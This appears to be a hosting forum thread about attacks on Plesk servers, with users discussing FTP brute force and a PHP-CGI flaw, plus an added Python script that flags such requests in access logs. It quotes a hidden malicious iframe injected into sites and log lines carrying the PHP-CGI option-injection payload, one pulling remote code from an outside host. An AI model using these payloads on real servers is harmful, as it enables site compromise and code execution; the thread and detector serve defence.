
Under Attack?

how we can solve this problem totally.

Regards,
Hamed

I do not see information from you that you are using all the latest OS and Plesk updates, and I did not receive login credentials from you in PM.
 
We use the latest updates. I cannot provide login credentials because of a limitation on RDP allowed IP addresses in the hardware firewall, but if you tell me where exactly I can see FTP logs in Windows Server 2008, I can provide them to you.

Regards,
Hamed
 
Sorry, but our guys from the Security Team would like to investigate this issue directly on an affected Plesk server which fully satisfies the mentioned conditions.
 
Hi,

Do you know from which countries the attacks are done? I couldn't find any IP address to block. I want to block all the attackers' countries' IP addresses to FTP because another attack was done today:
<!-- . --><iframe width="1px" height="1px" src="http://www.testotic.mrbasic.com/openstat/appropriate/audience_clearest_concerns_sophisticating.php" style="display: block;" ></iframe>
 
Our problems are on old Plesk 8.xx servers, but it seems that blocking all FTP from all sources helps keep them clean. Until now all sites are OK.
 
1. Someone mentioned a brute-force FTP attack, with the log showing about 10 attempts per second. Is it not possible to restrict attempts to the same account, to only once per ten seconds or more?

2. I think cPanel has an option to disable FTP access, unless you enable it in the Control Panel for, say, 60 minutes, before it automatically closes access. I wouldn't necessarily endorse this, as it could enable a keyboard logger to then gain access to your Control Panel. Tumblr has a nice option where you can post a message using a secret email address. I wonder whether a secret email could be used to enable FTP access for a limited time, e.g. ftp-secret-code-2255$$@mydomain.com
 
Here is some info for all Plesk 8/9 users:

http://www.heise.de/security/meldung/Angeblicher-Zero-Day-Exploit-fuer-Plesk-1883732.html (German)
http://seclists.org/fulldisclosure/2013/Jun/25 (English)

I found lines like this in my /var/log/httpd/access_log (from different IPs):

199.241.30.23 - - [17/Jun/2013:21:32:38 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0" 404 272 "-" "Mozilla/5.0 (compatible; Googlebot/2.1;
String decoded: /phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n

and decoded too:
189.73.185.158 - - [20/Jun/2013:00:11:33 +0200] "GET /phppath/php?-d+allow_url_include%3d1+-d+safe_mode%3d0+-d+suhosin.simulation%3d1+-d+disable_functions%3d''+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://blackhole.hostenko.com/1.txt+-n HTTP/1.0" 404 272 "-" "MSIE9"

I use Plesk 11.0.9#53. I think with the 404 return code this was not successful in 11.0.9?
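A way to find requests like the two quoted in the post above across a whole access log, written as an added example and not code from any poster or from Plesk: it percent-decodes each request target and reports those whose query string passes `-d` php.ini overrides, together with the status code returned. The sample lines are constructed (documentation IP ranges, placeholder host), and the `review_first` flag for any status other than 404 is a triage assumption, not a statement about which versions are affected.

```python
import re
from urllib.parse import unquote

# Apache access-log prefix: client IP, [timestamp], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) .*?\[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# php.ini settings the requests quoted in this thread try to override with -d
DIRECTIVES = ("allow_url_include", "auto_prepend_file", "disable_functions",
              "open_basedir", "safe_mode", "suhosin.simulation")

def decode_target(target):
    """Split path and query, then percent-decode both ('+' separates arguments)."""
    path, _, query = target.partition("?")
    return unquote(path), unquote(query.replace("+", " "))

def inspect_line(line):
    """Return a finding dict for a PHP option-injection probe, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, when, method, target, status = m.groups()
    path, query = decode_target(target)
    if not query.startswith("-"):      # ordinary queries are name=value pairs
        return None
    hits = [d for d in DIRECTIVES
            if re.search(r"-d\s+" + re.escape(d) + r"\s*=", query)]
    if not hits:
        return None
    return {"ip": ip, "time": when, "method": method, "path": path,
            "directives": hits, "status": int(status),
            "review_first": status != "404"}   # assumption: non-404 gets triaged first

def scan(lines):
    """Run inspect_line over an iterable of log lines and keep the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines modelled on the log excerpts in the thread
SAMPLE = [
    '203.0.113.10 - - [17/Jun/2013:21:32:38 +0200] "POST /%70%68%70%70%61%74%68/%70%68%70'
    '?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6E'
    ' HTTP/1.0" 404 272 "-" "-"',
    '203.0.113.20 - - [20/Jun/2013:00:11:33 +0200] "GET /phppath/php?-d+allow_url_include%3d1'
    '+-d+open_basedir%3dnone+-d+auto_prepend_file%3dhttp://example.invalid/1.txt+-n'
    ' HTTP/1.0" 404 272 "-" "MSIE9"',
    '198.51.100.7 - - [20/Jun/2013:00:12:01 +0200] "GET /index.php?id=5&sort=-d HTTP/1.1" 200 5120 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f["time"], f["ip"], f["path"], f["status"], ",".join(f["directives"]))
```

To run it over a real log, pass the open file object to `scan()` instead of `SAMPLE`.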
 